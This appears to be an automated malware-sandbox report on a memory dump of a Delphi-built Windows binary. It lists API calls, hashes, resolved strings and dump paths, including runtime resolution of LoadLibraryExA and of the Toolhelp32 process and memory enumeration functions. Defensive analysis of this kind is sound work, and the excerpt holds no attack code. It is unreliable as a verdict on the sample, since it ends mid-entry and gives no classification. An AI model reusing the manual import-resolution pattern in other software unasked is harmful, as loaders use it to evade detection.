• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: e2ee779de501fecfbc3e4ccb885c337652da04c923376aae4a2db13408c15a75
• Instruction ID: 40c87468066ac73c2d1b2dae6cf60d352e0bfc2b4034d71954af76cf0ca1cc7f
• Opcode Fuzzy Hash: e2ee779de501fecfbc3e4ccb885c337652da04c923376aae4a2db13408c15a75
• Instruction Fuzzy Hash: F3F0B4F2B44795BBDB219F5ADC817A2BBA4FB40314F0501B9F94C9B340D771A8118B98
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 02981704
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 62d7d5f28d9f8ccecee2e4e09ba2276eeecc480eeed70850dcbc7ea20adfd4ea
• Instruction ID: c3aa9b8a8e021dfbd5e1429de91ecd0f0ed3f8ff6da3c9b86cbfaaf8f3112531
• Opcode Fuzzy Hash: 62d7d5f28d9f8ccecee2e4e09ba2276eeecc480eeed70850dcbc7ea20adfd4ea
• Instruction Fuzzy Hash: 8BE0CDB5300301BFD7106B7D5D407227BDCEF84654F1C4879F549DB241D270E8118B64
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02999E1B,?,?,02999EAD,00000000,02999F89), ref: 02999BA8
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02999BC0
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02999BD2
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02999BE4
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02999BF6
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02999C08
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02999C1A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02999C2C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02999C3E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02999C50
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02999C62
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02999C74
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02999C86
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02999C98
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02999CAA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02999CBC
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02999CCE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                            • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                            • API String ID: 667068680-597814768
                                                                                                                            • Opcode ID: ba97919021f4e5b72c44f396cbdc37391dbd9ccaa6543b76a9cdfefd444a4c00
                                                                                                                            • Instruction ID: e753ec16de842c3931447e0f3fe9ac7a7790ac6af1bc83706b4549436bb265fb
                                                                                                                            • Opcode Fuzzy Hash: ba97919021f4e5b72c44f396cbdc37391dbd9ccaa6543b76a9cdfefd444a4c00
                                                                                                                            • Instruction Fuzzy Hash: B831FDB0A852A4DFFF00AFB8D8C9E2933EDAF867107441969B429DF644E7749810CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,02987338,02980000,029AB790), ref: 029858E9
                                                                                                                            • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02985900
                                                                                                                            • lstrcpynA.KERNEL32(?,?,?), ref: 02985930
                                                                                                                            • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02987338,02980000,029AB790), ref: 02985994
                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02987338,02980000,029AB790), ref: 029859CA
                                                                                                                            • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02987338,02980000,029AB790), ref: 029859DD
                                                                                                                            • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02987338,02980000,029AB790), ref: 029859EF
                                                                                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02987338,02980000,029AB790), ref: 029859FB
                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02987338,02980000), ref: 02985A2F
                                                                                                                            • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02987338), ref: 02985A3B
                                                                                                                            • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02985A5D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                            • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                            • API String ID: 3245196872-1565342463
                                                                                                                            • Opcode ID: 266e5ab0769aff93166a824a94df68a1f92a7b7b50e46d271ae5dde388196dde
                                                                                                                            • Instruction ID: a6e680f17821c2d7c4fbb72142dcf6a25b37931aecff66a27730df54ba847e36
                                                                                                                            • Opcode Fuzzy Hash: 266e5ab0769aff93166a824a94df68a1f92a7b7b50e46d271ae5dde388196dde
                                                                                                                            • Instruction Fuzzy Hash: A9414C72D00219AFDB10EAE8CCC8AEEB7ADAF48354F4E45A5A149D7240E730DB498F54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02985BAC
                                                                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02985BB9
                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02985BBF
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02985BEA
                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02985C31
                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02985C41
                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02985C69
                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02985C79
                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02985C9F
                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02985CAF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                            • API String ID: 1599918012-2375825460
                                                                                                                            • Opcode ID: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                                                            • Instruction ID: 67094e6d957d7a5a555fbcd91ef9e39705753ee4432f7cf131361bfb657d8bc0
                                                                                                                            • Opcode Fuzzy Hash: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                                                            • Instruction Fuzzy Hash: 133188B1E4011C2AFF25E6B4DC45FDF77AD5B44380F8A41E19608E61C1D7749E888F51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02987FB1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DiskFreeSpace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1705453755-0
                                                                                                                            • Opcode ID: b0f2a126e6bfdbec3624709fe996a37f07710e4d7c3479fe4a57f6dc015cd93b
                                                                                                                            • Instruction ID: 7206e6ca4a6bfe504c69779583c0c02e69fa9271a6b0eb523bdfc79133cd6b6e
                                                                                                                            • Opcode Fuzzy Hash: b0f2a126e6bfdbec3624709fe996a37f07710e4d7c3479fe4a57f6dc015cd93b
                                                                                                                            • Instruction Fuzzy Hash: BC11DEB5E00209AFDB04DF99C981DEFF7F9FFC8300B54C569A519EB254E6719A018BA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0298A79E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2299586839-0
                                                                                                                            • Opcode ID: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
                                                                                                                            • Instruction ID: cdfa407f403a5af3eef842b887c7354e0a8b7871727d99710dada8dfcd333552
                                                                                                                            • Opcode Fuzzy Hash: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
                                                                                                                            • Instruction Fuzzy Hash: 68E0D872B0021817D710B5689C809FA739DAB9C710F08457FBD08C7341EEA09D404AE4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetVersionExA.KERNEL32(?,029AA106,00000000,029AA11E), ref: 0298B756
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Version
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1889659487-0
                                                                                                                            • Opcode ID: 376daf8f3a9830a21ce095000c8e89996491c74e6f1c194c4dc248003d6fb888
                                                                                                                            • Instruction ID: 4fda89da9c5d19d5c809717b47734b435489cecd0d95f0248f8289f3b9dedc97
                                                                                                                            • Opcode Fuzzy Hash: 376daf8f3a9830a21ce095000c8e89996491c74e6f1c194c4dc248003d6fb888
                                                                                                                            • Instruction Fuzzy Hash: 0FF0B7749483019FC350EF28D46072577E5FF99718F084D2DE498C7B80E77898148F92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0298BE2E,00000000,0298C047,?,?,00000000,00000000), ref: 0298A7DF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2299586839-0
                                                                                                                            • Opcode ID: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
                                                                                                                            • Instruction ID: 1d293169e723749181476edf004ea673e0352bc4865aa653a86640b44f591fcf
                                                                                                                            • Opcode Fuzzy Hash: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
                                                                                                                            • Instruction Fuzzy Hash: 47D05E6630E2A03AA220A15A2D84DBB5AECCBC57A1F08443EF948CA201E200CC06A6B1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LocalTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 481472006-0
                                                                                                                            • Opcode ID: 6ad7acb16520d0ee23af696196ffd6f674aa908e5bbfab1d4a9cc499efc34d38
                                                                                                                            • Instruction ID: edf09770ef5b87482194831e3c07699c2da6464e978caf543d42d0589570a63a
                                                                                                                            • Opcode Fuzzy Hash: 6ad7acb16520d0ee23af696196ffd6f674aa908e5bbfab1d4a9cc499efc34d38
                                                                                                                            • Instruction Fuzzy Hash: 03A011008088200282803B280C0223A3088A880A20FC80B88A8F8882E0EA2E022880E3
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0298D259
                                                                                                                              • Part of subcall function 0298D224: GetProcAddress.KERNEL32(00000000), ref: 0298D23D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                            • API String ID: 1646373207-1918263038
                                                                                                                            • Opcode ID: b8045882b8bdfef0b96cdc03314bed4551e8eac915daf86c68c9fd65fb7a38d0
                                                                                                                            • Instruction ID: 935a30438f4d02f32659812b580f87a1a1a6217c3900c3c17aebe5daf86308e4
                                                                                                                            • Opcode Fuzzy Hash: b8045882b8bdfef0b96cdc03314bed4551e8eac915daf86c68c9fd65fb7a38d0
                                                                                                                            • Instruction Fuzzy Hash: A7417872A493449B96187B7E780043BB7DAEA9675036C641BB418DF7C4DE30EC528E3A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02996E9A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02996EAB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02996EBB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02996ECB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02996EDB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02996EEB
                                                                                                                            • GetProcAddress.KERNEL32 ref: 02996EFB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                            • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                            • API String ID: 667068680-2233174745
                                                                                                                            • Opcode ID: 3650b5f91f4c14e92bf67bc389f1fc54c7627403cc8d1594e81a0a468a09023b
                                                                                                                            • Instruction ID: 991fd26444195f923ef8477cec9218b8d36b79973def3a12e546672bdcddfdf3
                                                                                                                            • Opcode Fuzzy Hash: 3650b5f91f4c14e92bf67bc389f1fc54c7627403cc8d1594e81a0a468a09023b
                                                                                                                            • Instruction Fuzzy Hash: 67F0ACB1ACE3946DBB007B785CAEA3A2B9D99E1658344183D64376D981EAB488104F60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029828CE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message
                                                                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                            • API String ID: 2030045667-32948583
                                                                                                                            • Opcode ID: a177a69c1a533fc4aeca6e9e6db1bf0051e814d38ece04156de2046ea0276f54
                                                                                                                            • Instruction ID: 06a3f07bf955e65433c7aa2ce3fe585615dbb3198937a6215d69a80adbec0a3c
                                                                                                                            • Opcode Fuzzy Hash: a177a69c1a533fc4aeca6e9e6db1bf0051e814d38ece04156de2046ea0276f54
                                                                                                                            • Instruction Fuzzy Hash: 29A1D130E043E48BDF21BB2CCC84BA9B7E9EB49750F1840E5ED49AB285CB759985CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 0299A078
                                                                                                                            • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 0299A08F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 0299A095
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 0299A123
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 0299A12F
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 0299A143
                                                                                                                            Strings
                                                                                                                            • LoadLibraryExA, xrefs: 0299A085
                                                                                                                            • C:\Windows\System32\KernelBase.dll, xrefs: 0299A08A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Read$AddressHandleModuleProc
                                                                                                                            • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                                                            • API String ID: 1061262613-1650066521
                                                                                                                            • Opcode ID: 9d6d9d5671ad2d03735b5f83d2874df2d2f65473a8dd8e420ee96f747f30b939
                                                                                                                            • Instruction ID: fb5e54c0f2f4f974b97ae05fa695f4557de0ed602251cf2d470546a47eba79eb
                                                                                                                            • Opcode Fuzzy Hash: 9d6d9d5671ad2d03735b5f83d2874df2d2f65473a8dd8e420ee96f747f30b939
                                                                                                                            • Instruction Fuzzy Hash: 03311CB1A41205BFDF20EF68CC85F6AB7ACEF45768F044554EA14AB281D774A9508F60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            • bytes: , xrefs: 0298275D
                                                                                                                            • An unexpected memory leak has occurred. , xrefs: 02982690
                                                                                                                            • , xrefs: 02982814
                                                                                                                            • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02982849
                                                                                                                            • 7, xrefs: 029826A1
                                                                                                                            • The unexpected small block leaks are:, xrefs: 02982707
                                                                                                                            • Unexpected Memory Leak, xrefs: 029828C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                            • API String ID: 0-2723507874
                                                                                                                            • Opcode ID: 19b1222eb70c76fa339346bbb23c96d12513bef5b3f52b78fd6ef6b679056192
                                                                                                                            • Instruction ID: 2f9aea6da0e1ba06d9544077cf56c9bc61c163a380f35e007a1257e63f4087e4
                                                                                                                            • Opcode Fuzzy Hash: 19b1222eb70c76fa339346bbb23c96d12513bef5b3f52b78fd6ef6b679056192
                                                                                                                            • Instruction Fuzzy Hash: 1A71C230E042D88FDF21BB2CCC84BA9BAE9EB49744F1840E5D949DB281DB758AC5CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetThreadLocale.KERNEL32(00000000,0298C047,?,?,00000000,00000000), ref: 0298BDB2
                                                                                                                              • Part of subcall function 0298A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0298A79E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                            • API String ID: 4232894706-2493093252
                                                                                                                            • Opcode ID: 10ff2a8bb53d927a9fa01bf878789205071348e4d9f2387e9c051627016e46a4
                                                                                                                            • Instruction ID: 552433d4696bba51a80b9c23e7b24d225c278d6b1e589863ac93f8f3fccf5cea
                                                                                                                            • Opcode Fuzzy Hash: 10ff2a8bb53d927a9fa01bf878789205071348e4d9f2387e9c051627016e46a4
                                                                                                                            • Instruction Fuzzy Hash: 12613F34B002499BDB04FBB4D850AAFB7FBDFC8300F5C9476E111AB245DA39D9069BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029843E7,?,?,029E37C8,?,?,029AB7A8,02986575,029AA305), ref: 02984359
